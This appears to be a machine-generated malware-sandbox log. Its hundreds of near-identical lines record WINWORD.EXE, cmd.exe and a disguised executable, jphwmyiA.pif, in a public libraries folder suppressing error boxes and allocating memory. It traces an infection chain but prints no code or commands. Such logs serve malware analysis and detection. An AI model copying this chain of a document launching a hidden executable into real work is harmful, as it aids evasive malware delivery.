                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 20E50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 21120000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifMemory allocated: 23120000 memory reserve | memory write watchJump to behavior
